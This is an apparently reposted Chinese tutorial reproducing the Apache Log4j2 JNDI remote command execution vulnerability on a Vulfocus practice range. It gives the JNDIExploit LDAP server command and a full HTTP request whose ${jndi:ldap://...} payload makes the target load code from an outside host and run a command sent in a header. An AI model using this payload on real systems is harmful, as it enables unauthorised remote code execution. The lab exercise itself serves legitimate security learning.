【Vulfocus解题系列】手把手教你使用Vulfocus公开靶场对Apache Log4j2远程命令执行漏洞复现


前言

关于这个漏洞,啥都不用说了,直接发车。

工具下载

JNDIExploit:https://github.com/0x727/JNDIExploit

复现过程

  1. 启动靶场环境

    直接用vulfocus启一个环境。
    官网地址:http://vulfocus.fofa.so/

​ 没注册的先注册,进来首页即可看到靶场

image-20211212143803332

  1. 用JNDIExploit启一个ldap的服务。

  2. 命令如下:

    java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 8988 -i 0.0.0.0

    image-20211212145457761

  3. 接着将payload更改如下:
    payload=$

    注意Content-Type的类型为:application/x-www-form-urlencoded
    在请求头中添加cmd字段,后面跟上需要执行的命令即可。

    完整数据包如下:

    POST /hello  HTTP/1.1
    Host: vulfocus.fofa.so:41624
    Content-Type: application/x-www-form-urlencoded
    cmd: whoami
    Content-Length: 47
    
    payload=${jndi:ldap://1.2.3.4:1234/TomcatBypass/TomcatEcho}
    

    成功回显命令:

    image-20211212145553316

后记

本文章仅为学习交流,请勿利用从事非法渗透测试,否则后果自负,与本人无关。
本漏洞推荐使用公开靶场或自己搭建环境进行复现和研究,但切忌进行未授权测试。


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM